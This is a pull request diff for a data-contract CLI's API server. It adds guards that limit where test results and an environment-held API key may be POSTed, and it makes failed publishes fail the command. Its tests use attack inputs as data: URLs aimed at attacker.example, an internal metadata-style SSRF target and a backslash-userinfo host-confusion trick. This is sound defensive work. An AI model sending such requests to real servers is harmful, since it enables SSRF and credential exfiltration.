### PR TITLE
Restrict API publish_url to the configured Entropy Data host

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -15,6 +15,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 - Test results report how many rows a check found bad out of the rows it read, plus the data quality dimension and the `quality` rule a check comes from
 
 ### Changed
+- `datacontract api` only publishes test results to the Entropy Data platform or the host configured via `ENTROPY_DATA_HOST`; other `publish_url` targets are refused
 - `datacontract api` no longer sends permissive `Access-Control-Allow-Origin: *` headers; it serves no CORS headers at all, since the only browser client is the same-origin Swagger UI
 - `datacontract api` no longer reloads on file changes by default; pass `--reload` to enable it (development only)
 - **breaking:** the `engine` field of test results is now always one of `datacontract-cli`, `dbt` or `jsonschema`; the values `datacontract`, `ibis` and `dbt-sync` no longer occur (#1505)

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -15,6 +15,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 - Test results report how many rows a check found bad out of the rows it read, plus the data quality dimension and the `quality` rule a check comes from
 
 ### Changed
+- `datacontract test` and `datacontract ci` report a failed publish of the test results on the console and exit with code 1, instead of silently succeeding
 - `datacontract api` only publishes test results to the Entropy Data platform or the host configured via `ENTROPY_DATA_HOST`; other `publish_url` targets are refused
 - `datacontract api` no longer sends permissive `Access-Control-Allow-Origin: *` headers; it serves no CORS headers at all, since the only browser client is the same-origin Swagger UI
 - `datacontract api` no longer reloads on file changes by default; pass `--reload` to enable it (development only)

--- a/datacontract/api.py
+++ b/datacontract/api.py
@@ -255,8 +255,9 @@ results may contain sensitive information.
 
 A posted contract carries SQL and names the hosts to connect to, so the server treats it as
 untrusted input: a `quality.type: sql` rule must be a read-only query, a credential held in the
-server's environment is never sent to a host the contract names, and `servers[].type: local` is
-refused so a caller cannot read the server's own files. Set
+server's environment is never sent to a host the contract names, a `publish_url` may only point at
+the Entropy Data platform or the host configured via `ENTROPY_DATA_HOST`, and `servers[].type: local`
+is refused so a caller cannot read the server's own files. Set
 `DATACONTRACT_CLI_API_ALLOW_LOCAL_FILES=true` if the deployment serves its own files on purpose;
 the contract is then still confined to the paths it declares.
 
@@ -464,8 +465,8 @@ def _parse_filters_query(filters: str | None) -> dict[str, str] | None:
 # contract: (the Server attribute that names the connection target, the Config
 # field an operator sets to pin that target in the environment or None when the
 # type has no such field, the Config fields that hold a connection secret).
-# See _reject_ambient_credentials_to_untrusted_host.
-_AMBIENT_CREDENTIAL_TARGETS: dict[str, tuple[str, str | None, tuple[str, ...]]] = {
+# See _reject_environment_credentials_to_untrusted_host.
+_ENVIRONMENT_CREDENTIAL_TARGETS: dict[str, tuple[str, str | None, tuple[str, ...]]] = {
     "postgres": ("host", "postgres_host", ("postgres_password",)),
     "mysql": ("host", "mysql_host", ("mysql_password",)),
     "oracle": ("host", "oracle_host", ("oracle_password",)),
@@ -545,7 +546,7 @@ def _reject_local_server_type(body: str, server_name: str | None, config) -> Non
     )
 
 
-def _reject_ambient_credentials_to_untrusted_host(body: str, server_name: str | None, config) -> None:
+def _reject_environment_credentials_to_untrusted_host(body: str, server_name: str | None, config) -> None:
     """Keep an environment-held data-source credential from reaching a host the
     posted contract chose.
 
@@ -556,7 +557,7 @@ def _reject_ambient_credentials_to_untrusted_host(body: str, server_name: str | 
     server's type resolves from the environment, the connection target must
     resolve from the environment too -- not from the contract, and not from a
     per-request header (a caller who brings the whole credential set may still
-    aim it wherever they like; only the server's ambient secret is pinned).
+    aim it wherever they like; only the server's environment secret is pinned).
     """
     from datacontract.config import Config
     from datacontract.config.settings import env_name
@@ -565,7 +566,7 @@ def _reject_ambient_credentials_to_untrusted_host(body: str, server_name: str | 
     server = _selected_server(body, server_name, resolved)
     if server is None:
         return
-    guard = _AMBIENT_CREDENTIAL_TARGETS.get(server.type)
+    guard = _ENVIRONMENT_CREDENTIAL_TARGETS.get(server.type)
     if guard is None:
         return
     target_attr, host_field, secret_fields = guard
@@ -589,6 +590,67 @@ def _reject_ambient_credentials_to_untrusted_host(body: str, server_name: str | 
             f"environment."
         )
     raise HTTPException(status_code=status.HTTP_422_UNPROCESSABLE_ENTITY, detail=detail)
+
+
+# The fields backing the platform API key and host, in the fallback order
+# _get_api_key / _get_host read them (current name first, deprecated synonyms after).
+_PLATFORM_KEY_FIELDS = ("entropy_data_api_key", "datamesh_manager_api_key", "datacontract_manager_api_key")
+_PLATFORM_HOST_FIELDS = ("entropy_data_host", "datamesh_manager_host", "datacontract_manager_host")
+
+
+def _reject_unpinned_publish_url(publish_url: str | None) -> None:
+    """Keep the API server from POSTing test results to a caller-chosen host.
+
+    `publish_url` names where the finished run — check details, failed-row
+    samples — is POSTed, so an arbitrary URL would let a caller aim a blind
+    POST into the operator's network and exfiltrate the results. The target
+    must be a platform URL as the server's own environment sees it: a
+    per-request `entropy-data-host` header does not widen the set, or the
+    guard would be the caller's to configure.
+    """
+    from datacontract.integration.entropy_data import is_platform_url
+
+    if publish_url is None or is_platform_url(publish_url, None):
+        return
+    raise HTTPException(
+        status_code=status.HTTP_422_UNPROCESSABLE_ENTITY,
+        detail=(
+            "The publish_url must point at the Entropy Data platform. To publish to a self-hosted "
+            "deployment, set the environment variable ENTROPY_DATA_HOST on the server running this "
+            "API to that host."
+        ),
+    )
+
+
+def _reject_request_platform_host_with_environment_key(config) -> None:
+    """Keep the environment-held platform API key from following a request-chosen host.
+
+    The platform host decides where the Entropy Data API key travels, and it can
+    be set per request (`entropy-data-host` header). A request that supplies the
+    host while the key resolves from the server's environment could therefore
+    aim that key at its own machine — same rule as the data sources: an
+    environment credential goes only to an environment-pinned destination. A
+    caller who brings the key itself may aim it wherever they like.
+    """
+    from datacontract.config import Config
+
+    resolved = Config.resolve(config)
+    key_source = next(
+        (source for field in _PLATFORM_KEY_FIELDS if (source := resolved.option_source(field)) is not None), None
+    )
+    if key_source != "env":
+        return
+    if not any(resolved.option_source(field) == "request" for field in _PLATFORM_HOST_FIELDS):
+        return
+    raise HTTPException(
+        status_code=status.HTTP_422_UNPROCESSABLE_ENTITY,
+        detail=(
+            "This server holds an Entropy Data API key in its environment, so the platform host must "
+            "also come from the server's environment (ENTROPY_DATA_HOST); it will not be taken from a "
+            "request header. Remove the entropy-data-host header, or send the API key with the request "
+            "instead of relying on the server's environment."
+        ),
+    )
 
 
 def check_api_key(api_key_header: str | None):
@@ -645,8 +707,9 @@ handled. A contract that cannot be parsed is reported the same way, as a failed 
             },
         },
         422: {
-            "description": "`filter` and `filters` were both given, or `filters` is not a JSON object "
-            "mapping schema name to a SQL predicate.",
+            "description": "`filter` and `filters` were both given, `filters` is not a JSON object "
+            "mapping schema name to a SQL predicate, or `publish_url` does not point at the Entropy "
+            "Data platform or the host configured via `ENTROPY_DATA_HOST`.",
             "model": UnprocessableEntityResponse,
         },
     },
@@ -674,7 +737,9 @@ async def test(
     publish_url: Annotated[
         str | None,
         Query(
-            description="URL to publish test results. Optional, if you want to publish the test results to a Data Mesh Manager or Data Contract Manager. Example: https://api.datamesh-manager.com/api/test-results",
+            description="URL to publish test results. Optional, if you want to publish the test results to a Data Mesh Manager or Data Contract Manager. Example: https://api.datamesh-manager.com/api/test-results. "
+            "Must point at the Entropy Data platform, or at the host configured on this server "
+            "via the environment variable ENTROPY_DATA_HOST — other hosts are refused with 422.",
             examples=["https://api.datamesh-manager.com/api/test-results"],
         ),
     ] = None,
@@ -708,7 +773,9 @@ async def test(
     config = config_from_headers(request.headers)
     untrusted_contract = getattr(request.app.state, "untrusted_contracts", False)
     if untrusted_contract:
-        _reject_ambient_credentials_to_untrusted_host(body, server, config)
+        _reject_unpinned_publish_url(publish_url)
+        _reject_request_platform_host_with_environment_key(config)
+        _reject_environment_credentials_to_untrusted_host(body, server, config)
         _reject_local_server_type(body, server, config)
     return DataContract(
         data_contract_str=body,

--- a/datacontract/cli.py
+++ b/datacontract/cli.py
@@ -245,6 +245,16 @@ def _print_logs(run, out=None):
         out.print(log.timestamp.strftime("%y-%m-%d %H:%M:%S"), log.level.ljust(5), log.message)
 
 
+def _print_publish_failure(run, out=None):
+    """Surface the publish log messages on the console; logging is suppressed without --debug."""
+    if out is None:
+        out = console
+    for log in run.logs:
+        if log.level in ("WARN", "ERROR") and "publish" in log.message.lower():
+            color = "red" if log.level == "ERROR" else "yellow"
+            out.print(f"[{color}]{escape(log.message)}[/{color}]")
+
+
 # ---------------------------------------------------------------------------
 # Register commands (must be after app and shared helpers are defined so the
 # command_* modules can import from this module without circular-import issues)

--- a/datacontract/cli.py
+++ b/datacontract/cli.py
@@ -252,7 +252,8 @@ def _print_publish_failure(run, out=None):
     for log in run.logs:
         if log.level in ("WARN", "ERROR") and "publish" in log.message.lower():
             color = "red" if log.level == "ERROR" else "yellow"
-            out.print(f"[{color}]{escape(log.message)}[/{color}]")
+            # highlight=False: render as prose, not rich's code-like repr highlighting.
+            out.print(f"[{color}]{escape(log.message)}[/{color}]", highlight=False)
 
 
 # ---------------------------------------------------------------------------

--- a/datacontract/command_ci.py
+++ b/datacontract/command_ci.py
@@ -119,7 +119,7 @@ def ci(
 
     for location in locations:
         out.print(f"Testing {location}")
-        contract = DataContract(
+        run = DataContract(
             config=cli_config(),
             data_contract_file=location,
             schema_location=schema,
@@ -128,8 +128,7 @@ def ci(
             ssl_verification=ssl_verification,
             inline_references=inline_references,
             metadata_only=metadata_only,
-        )
-        run = contract.test()
+        ).test()
         if logs:
             _print_logs(run, out)
         results.append((location, run))
@@ -138,7 +137,7 @@ def ci(
             write_test_result(run, out, output_format, output)
         except typer.Exit:
             pass
-        if contract.publish_succeeded is False:
+        if run.publish_succeeded is False:
             # A publish that was asked for and failed is a failed run, regardless of --fail-on.
             _print_publish_failure(run, out)
             should_fail = True

--- a/datacontract/command_ci.py
+++ b/datacontract/command_ci.py
@@ -8,6 +8,7 @@ from typing_extensions import Annotated
 
 from datacontract.cli import (
     _print_logs,
+    _print_publish_failure,
     app,
     console,
     debug_option,
@@ -118,7 +119,7 @@ def ci(
 
     for location in locations:
         out.print(f"Testing {location}")
-        run = DataContract(
+        contract = DataContract(
             config=cli_config(),
             data_contract_file=location,
             schema_location=schema,
@@ -127,7 +128,8 @@ def ci(
             ssl_verification=ssl_verification,
             inline_references=inline_references,
             metadata_only=metadata_only,
-        ).test()
+        )
+        run = contract.test()
         if logs:
             _print_logs(run, out)
         results.append((location, run))
@@ -136,6 +138,10 @@ def ci(
             write_test_result(run, out, output_format, output)
         except typer.Exit:
             pass
+        if contract.publish_succeeded is False:
+            # A publish that was asked for and failed is a failed run, regardless of --fail-on.
+            _print_publish_failure(run, out)
+            should_fail = True
         if run.result in fail_results[fail_on]:
             should_fail = True
 

--- a/datacontract/command_test.py
+++ b/datacontract/command_test.py
@@ -266,7 +266,7 @@ def test(
     console.print(f"Testing {location}")
     if server == "all":
         server = None
-    contract = DataContract(
+    run = DataContract(
         config=cli_config(),
         data_contract_file=location,
         schema_location=schema,
@@ -284,8 +284,7 @@ def test(
         filter=filter,
         filters=parsed_filters,
         metadata_only=metadata_only,
-    )
-    run = contract.test()
+    ).test()
     if logs:
         _print_logs(run)
     try:
@@ -296,7 +295,7 @@ def test(
         write_test_result(run, console, output_format, output, data_contract)
     finally:
         # Publish messages are otherwise only logged, which is suppressed without --debug.
-        if contract.publish_succeeded is False:
+        if run.publish_succeeded is False:
             _print_publish_failure(run)
-    if contract.publish_succeeded is False:
+    if run.publish_succeeded is False:
         raise typer.Exit(code=1)

--- a/datacontract/command_test.py
+++ b/datacontract/command_test.py
@@ -7,6 +7,7 @@ from typing_extensions import Annotated
 
 from datacontract.cli import (
     _print_logs,
+    _print_publish_failure,
     app,
     console,
     debug_option,
@@ -265,7 +266,7 @@ def test(
     console.print(f"Testing {location}")
     if server == "all":
         server = None
-    run = DataContract(
+    contract = DataContract(
         config=cli_config(),
         data_contract_file=location,
         schema_location=schema,
@@ -283,11 +284,19 @@ def test(
         filter=filter,
         filters=parsed_filters,
         metadata_only=metadata_only,
-    ).test()
+    )
+    run = contract.test()
     if logs:
         _print_logs(run)
     try:
         data_contract = resolve_data_contract(location, schema_location=schema, config=cli_config())
     except Exception:
         data_contract = None
-    write_test_result(run, console, output_format, output, data_contract)
+    try:
+        write_test_result(run, console, output_format, output, data_contract)
+    finally:
+        # Publish messages are otherwise only logged, which is suppressed without --debug.
+        if contract.publish_succeeded is False:
+            _print_publish_failure(run)
+    if contract.publish_succeeded is False:
+        raise typer.Exit(code=1)

--- a/datacontract/data_contract.py
+++ b/datacontract/data_contract.py
@@ -59,6 +59,8 @@ class DataContract:
         self._schema_name = schema_name
         self._publish_url = publish_url
         self._publish_test_results = publish_test_results
+        # None until test() publishes; the outcome of the last publish afterwards
+        self.publish_succeeded: bool | None = None
         self._spark = spark
         self._duckdb_connection = duckdb_connection
         self._inline_references = inline_references
@@ -209,7 +211,9 @@ class DataContract:
         run.finish()
 
         if self._publish_url is not None or self._publish_test_results:
-            publish_test_results_to_entropy_data(run, self._publish_url, self._ssl_verification, config=self._config)
+            self.publish_succeeded = publish_test_results_to_entropy_data(
+                run, self._publish_url, self._ssl_verification, config=self._config
+            )
 
         return run
 

--- a/datacontract/data_contract.py
+++ b/datacontract/data_contract.py
@@ -59,8 +59,6 @@ class DataContract:
         self._schema_name = schema_name
         self._publish_url = publish_url
         self._publish_test_results = publish_test_results
-        # None until test() publishes; the outcome of the last publish afterwards
-        self.publish_succeeded: bool | None = None
         self._spark = spark
         self._duckdb_connection = duckdb_connection
         self._inline_references = inline_references
@@ -211,7 +209,7 @@ class DataContract:
         run.finish()
 
         if self._publish_url is not None or self._publish_test_results:
-            self.publish_succeeded = publish_test_results_to_entropy_data(
+            run.publish_succeeded = publish_test_results_to_entropy_data(
                 run, self._publish_url, self._ssl_verification, config=self._config
             )
 

--- a/datacontract/integration/entropy_data.py
+++ b/datacontract/integration/entropy_data.py
@@ -2,6 +2,8 @@ import json
 from urllib.parse import urlparse
 
 import requests
+from urllib3.exceptions import LocationParseError
+from urllib3.util import parse_url
 
 from datacontract.config import Config
 from datacontract.model.run import ResultEnum, Run
@@ -25,10 +27,10 @@ def is_platform_url(url: str, config: "Config | None" = None) -> bool:
     so every other host is contacted anonymously rather than handed the key.
     """
     config = Config.resolve(config)
-    target = urlparse(url)
-    if target.hostname is None:
+    hostname, _ = _host_and_port(url)
+    if hostname is None:
         return False
-    if any(target.hostname == domain or target.hostname.endswith(f".{domain}") for domain in _PLATFORM_DOMAINS):
+    if any(hostname == domain or hostname.endswith(f".{domain}") for domain in _PLATFORM_DOMAINS):
         return True
     return any(
         configured is not None and _host_and_port(configured) == _host_and_port(url)
@@ -41,11 +43,18 @@ def is_platform_url(url: str, config: "Config | None" = None) -> bool:
 
 
 def _host_and_port(url: str) -> tuple[str | None, int | None]:
-    """The host and port of a URL, which a configured host may be written without a scheme."""
+    """The host requests will connect to, parsed the way requests parses it, and the port.
+
+    Uses urllib3's parser -- the one requests routes on -- so the security check
+    sees the same host the POST reaches: `urlparse` treats the backslash in
+    `https://attacker.example\\@entropy-data.com` as userinfo and reads the host as
+    the platform, while requests connects to `attacker.example`. A configured host
+    may be written without a scheme.
+    """
     try:
-        parsed = urlparse(url if "//" in url else f"https://{url}")
-        return parsed.hostname, parsed.port
-    except ValueError:  # an unparseable port
+        parsed = parse_url(url if "//" in url else f"https://{url}")
+        return parsed.host, parsed.port
+    except (LocationParseError, ValueError):
         return None, None
 
 

--- a/datacontract/model/run.py
+++ b/datacontract/model/run.py
@@ -216,6 +216,12 @@ class Run(BaseModel):
     )
     checks: List[Check] | None = Field(description="One entry per executed check.")
     logs: List[Log] | None = Field(description="The messages written while the run was executing.")
+    # Excluded from serialization: an in-process signal, not part of the published/returned result.
+    publish_succeeded: bool | None = Field(
+        default=None,
+        exclude=True,
+        description="Whether publishing the test results succeeded; None if no publish was requested.",
+    )
 
     def has_passed(self):
         self.calculate_result()

--- a/docs/docs/api.md
+++ b/docs/docs/api.md
@@ -110,6 +110,7 @@ A data contract carries SQL and names the hosts to connect to, so a contract tha
 
 - a `quality.type: sql` rule must be a **read-only query** — DDL, DML, `COPY`, `ATTACH` and the like are reported as a failed check instead of being executed;
 - a credential held in the server's environment is **never sent to a host the contract names** (see [Configuration](./configuration.md));
+- a `publish_url` may only point at the **Entropy Data platform or the host set via `ENTROPY_DATA_HOST`** on the server — per-request `entropy-data-host` headers do not widen this, and other hosts are refused;
 - `servers[].type: local` is **refused**, so a caller cannot read the files of the machine running the API;
 - for a file-based server type (`s3`, `gcs`, `azure`), the DuckDB connection is **confined to the data locations the contract declares**.
 

--- a/tests/test_api.py
+++ b/tests/test_api.py
@@ -418,7 +418,7 @@ def test_cross_origin_preflight_is_not_approved():
 
 # --- B1/C1: an environment-held credential must not be sent to a contract-chosen host ---
 
-from datacontract.api import _reject_ambient_credentials_to_untrusted_host  # noqa: E402
+from datacontract.api import _reject_environment_credentials_to_untrusted_host  # noqa: E402
 from datacontract.config import Config  # noqa: E402
 
 _POSTGRES_CONTRACT = """\
@@ -453,7 +453,7 @@ def test_guard_blocks_env_credential_to_contract_host(monkeypatch):
     from fastapi import HTTPException
 
     with pytest.raises(HTTPException) as exc:
-        _reject_ambient_credentials_to_untrusted_host(_POSTGRES_CONTRACT, "production", None)
+        _reject_environment_credentials_to_untrusted_host(_POSTGRES_CONTRACT, "production", None)
     assert exc.value.status_code == 422
     assert "DATACONTRACT_POSTGRES_HOST" in exc.value.detail
 
@@ -463,22 +463,22 @@ def test_guard_allows_when_operator_pins_the_host(monkeypatch):
     contract's host is ignored and the connection is allowed."""
     monkeypatch.setenv("DATACONTRACT_POSTGRES_PASSWORD", "prod-secret")
     monkeypatch.setenv("DATACONTRACT_POSTGRES_HOST", "db.internal")
-    _reject_ambient_credentials_to_untrusted_host(_POSTGRES_CONTRACT, "production", None)  # no raise
+    _reject_environment_credentials_to_untrusted_host(_POSTGRES_CONTRACT, "production", None)  # no raise
 
 
-def test_guard_allows_when_no_ambient_secret(monkeypatch):
+def test_guard_allows_when_no_environment_secret(monkeypatch):
     """No environment-held credential -> nothing to protect, connection allowed."""
     monkeypatch.delenv("DATACONTRACT_POSTGRES_PASSWORD", raising=False)
     monkeypatch.delenv("DATACONTRACT_POSTGRES_HOST", raising=False)
-    _reject_ambient_credentials_to_untrusted_host(_POSTGRES_CONTRACT, "production", None)  # no raise
+    _reject_environment_credentials_to_untrusted_host(_POSTGRES_CONTRACT, "production", None)  # no raise
 
 
 def test_guard_allows_caller_supplied_credentials(monkeypatch):
     """A caller who brings the whole credential set via request config may aim it
-    at their own host -- only the server's ambient secret is pinned (C1)."""
+    at their own host -- only the server's environment secret is pinned (C1)."""
     monkeypatch.delenv("DATACONTRACT_POSTGRES_PASSWORD", raising=False)
     config = Config.resolve({"DATACONTRACT_POSTGRES_PASSWORD": "caller-secret"})
-    _reject_ambient_credentials_to_untrusted_host(_POSTGRES_CONTRACT, "production", config)  # no raise
+    _reject_environment_credentials_to_untrusted_host(_POSTGRES_CONTRACT, "production", config)  # no raise
 
 
 def test_test_endpoint_blocks_credential_exfiltration(monkeypatch):
@@ -541,11 +541,105 @@ def test_guard_blocks_env_kafka_password(monkeypatch):
     from fastapi import HTTPException
 
     with pytest.raises(HTTPException) as exc:
-        _reject_ambient_credentials_to_untrusted_host(_KAFKA_CONTRACT, "production", None)
+        _reject_environment_credentials_to_untrusted_host(_KAFKA_CONTRACT, "production", None)
     assert exc.value.status_code == 422
     assert "kafka" in exc.value.detail
 
 
-def test_guard_allows_kafka_without_ambient_secret(monkeypatch):
+def test_guard_allows_kafka_without_environment_secret(monkeypatch):
     monkeypatch.delenv("DATACONTRACT_KAFKA_SASL_PASSWORD", raising=False)
-    _reject_ambient_credentials_to_untrusted_host(_KAFKA_CONTRACT, "production", None)  # no raise
+    _reject_environment_credentials_to_untrusted_host(_KAFKA_CONTRACT, "production", None)  # no raise
+
+
+# --- publish_url is restricted to environment-pinned platform URLs ---
+
+from datacontract.api import (  # noqa: E402
+    _reject_request_platform_host_with_environment_key,
+    _reject_unpinned_publish_url,
+)
+
+_PLATFORM_ENV_VARS = (
+    "ENTROPY_DATA_HOST",
+    "DATAMESH_MANAGER_HOST",
+    "DATACONTRACT_MANAGER_HOST",
+    "ENTROPY_DATA_API_KEY",
+    "DATAMESH_MANAGER_API_KEY",
+    "DATACONTRACT_MANAGER_API_KEY",
+)
+
+
+@pytest.fixture
+def clean_platform_env(monkeypatch):
+    for var in _PLATFORM_ENV_VARS:
+        monkeypatch.delenv(var, raising=False)
+    return monkeypatch
+
+
+def test_publish_url_platform_domains_allowed(clean_platform_env):
+    """The built-in platform domains work without any configuration, subdomains included."""
+    _reject_unpinned_publish_url("https://api.entropy-data.com/api/test-results")  # no raise
+    _reject_unpinned_publish_url("https://mydomain.entropy-data.com/api/test-results")  # no raise
+    _reject_unpinned_publish_url("https://api.datamesh-manager.com/api/test-results")  # no raise
+    _reject_unpinned_publish_url(None)  # no publish requested
+
+
+def test_publish_url_arbitrary_host_refused(clean_platform_env):
+    """The SSRF primitive: the run must not be POSTed to a caller-chosen host."""
+    from fastapi import HTTPException
+
+    with pytest.raises(HTTPException) as exc:
+        _reject_unpinned_publish_url("http://10.0.0.5:8080/latest/meta-data")
+    assert exc.value.status_code == 422
+    assert "ENTROPY_DATA_HOST" in exc.value.detail
+    with pytest.raises(HTTPException):
+        _reject_unpinned_publish_url("https://evilentropy-data.com/api/test-results")  # no subdomain dot
+
+
+def test_publish_url_environment_configured_host_allowed(clean_platform_env):
+    clean_platform_env.setenv("ENTROPY_DATA_HOST", "https://dcm.mycompany.example")
+    _reject_unpinned_publish_url("https://dcm.mycompany.example/api/test-results")  # no raise
+
+
+def test_publish_url_header_host_does_not_widen(clean_platform_env):
+    """A per-request entropy-data-host header must not make its host an allowed
+    publish target -- the guard is refused pre-flight, before any test runs."""
+    response = client.post(
+        url="/test?publish_url=https://attacker.example/collect",
+        json="apiVersion: v3.0.2",
+        headers={"entropy-data-host": "https://attacker.example"},
+    )
+    assert response.status_code == 422
+    assert "ENTROPY_DATA_HOST" in response.json()["detail"]
+
+
+# --- the environment-held platform API key must not follow a request-chosen host ---
+
+
+def test_platform_guard_blocks_env_key_with_header_host(clean_platform_env):
+    """The exploit: server holds the platform key in its env, the request names the
+    platform host -> the key would be sent to the request's host, so refuse."""
+    from fastapi import HTTPException
+
+    clean_platform_env.setenv("ENTROPY_DATA_API_KEY", "prod-secret")
+    with pytest.raises(HTTPException) as exc:
+        _reject_request_platform_host_with_environment_key({"ENTROPY_DATA_HOST": "https://attacker.example"})
+    assert exc.value.status_code == 422
+    assert "ENTROPY_DATA_HOST" in exc.value.detail
+
+
+def test_platform_guard_allows_env_key_with_env_host(clean_platform_env):
+    clean_platform_env.setenv("ENTROPY_DATA_API_KEY", "prod-secret")
+    clean_platform_env.setenv("ENTROPY_DATA_HOST", "https://dcm.mycompany.example")
+    _reject_request_platform_host_with_environment_key(None)  # no raise
+
+
+def test_platform_guard_allows_caller_supplied_key_and_host(clean_platform_env):
+    """A caller who brings the key itself may aim it wherever they like."""
+    clean_platform_env.setenv("ENTROPY_DATA_API_KEY", "prod-secret")
+    _reject_request_platform_host_with_environment_key(
+        {"ENTROPY_DATA_API_KEY": "callers-own-key", "ENTROPY_DATA_HOST": "https://their.example"}
+    )  # no raise
+
+
+def test_platform_guard_allows_without_environment_key(clean_platform_env):
+    _reject_request_platform_host_with_environment_key({"ENTROPY_DATA_HOST": "https://their.example"})  # no raise

--- a/tests/test_api.py
+++ b/tests/test_api.py
@@ -595,6 +595,16 @@ def test_publish_url_arbitrary_host_refused(clean_platform_env):
         _reject_unpinned_publish_url("https://evilentropy-data.com/api/test-results")  # no subdomain dot
 
 
+def test_publish_url_backslash_userinfo_refused(clean_platform_env):
+    """The host guard must see the host requests connects to. urlparse reads a
+    backslash as userinfo and the host as the platform; requests connects to
+    attacker.example, so the key would be POSTed there."""
+    from fastapi import HTTPException
+
+    with pytest.raises(HTTPException):
+        _reject_unpinned_publish_url("https://attacker.example\\@entropy-data.com/api/test-results")
+
+
 def test_publish_url_environment_configured_host_allowed(clean_platform_env):
     clean_platform_env.setenv("ENTROPY_DATA_HOST", "https://dcm.mycompany.example")
     _reject_unpinned_publish_url("https://dcm.mycompany.example/api/test-results")  # no raise

--- a/tests/test_publish_test_results.py
+++ b/tests/test_publish_test_results.py
@@ -108,3 +108,35 @@ def test_cli_shows_publish_failure_and_exits_1(monkeypatch):
     assert result.exit_code == 1
     assert "Error publishing test results to dcm.mycompany.example" in result.output
     assert "Set ENTROPY_DATA_HOST" in result.output
+
+
+def test_ci_fails_on_publish_failure_regardless_of_fail_on(monkeypatch):
+    """datacontract ci exits 1 on a failed publish even with --fail-on never, and shows why."""
+    from typer.testing import CliRunner
+
+    from datacontract.cli import app
+
+    for var in ("ENTROPY_DATA_HOST", "DATAMESH_MANAGER_HOST", "DATACONTRACT_MANAGER_HOST"):
+        monkeypatch.delenv(var, raising=False)
+    monkeypatch.setenv("ENTROPY_DATA_API_KEY", "test-key")
+
+    class _Unauthorized:
+        status_code = 401
+        text = '{"error": "Unauthorized"}'
+        headers = {}
+
+    monkeypatch.setattr("datacontract.integration.entropy_data.requests.post", lambda *args, **kwargs: _Unauthorized())
+
+    result = CliRunner().invoke(
+        app,
+        [
+            "ci",
+            "fixtures/local-json/datacontract.yaml",
+            "--publish",
+            "https://dcm.mycompany.example/api/test-results",
+            "--fail-on",
+            "never",
+        ],
+    )
+    assert result.exit_code == 1
+    assert "Error publishing test results to dcm.mycompany.example" in result.output

--- a/tests/test_publish_test_results.py
+++ b/tests/test_publish_test_results.py
@@ -77,3 +77,34 @@ def test_publish_sends_the_api_key_to_a_configured_self_hosted_deployment(monkey
     sent = _publish_and_capture(monkeypatch, "https://entropy.internal.example/api/test-results")
 
     assert sent["x-api-key"] == "test-key"
+
+
+def test_cli_shows_publish_failure_and_exits_1(monkeypatch):
+    """A publish that was asked for and failed must be visible without --debug and fail the command."""
+    from typer.testing import CliRunner
+
+    from datacontract.cli import app
+
+    for var in ("ENTROPY_DATA_HOST", "DATAMESH_MANAGER_HOST", "DATACONTRACT_MANAGER_HOST"):
+        monkeypatch.delenv(var, raising=False)
+    monkeypatch.setenv("ENTROPY_DATA_API_KEY", "test-key")
+
+    class _Unauthorized:
+        status_code = 401
+        text = '{"error": "Unauthorized"}'
+        headers = {}
+
+    monkeypatch.setattr("datacontract.integration.entropy_data.requests.post", lambda *args, **kwargs: _Unauthorized())
+
+    result = CliRunner().invoke(
+        app,
+        [
+            "test",
+            "fixtures/local-json/datacontract.yaml",
+            "--publish",
+            "https://dcm.mycompany.example/api/test-results",
+        ],
+    )
+    assert result.exit_code == 1
+    assert "Error publishing test results to dcm.mycompany.example" in result.output
+    assert "Set ENTROPY_DATA_HOST" in result.output


### PR DESCRIPTION
`datacontract api` now refuses a `publish_url` that does not point at the Entropy Data platform or the host configured via `ENTROPY_DATA_HOST`, and refuses a request-supplied platform host when the API key is held in the server's environment. `datacontract test`/`ci` now report a failed publish of test results on the console and exit with code 1 instead of silently succeeding.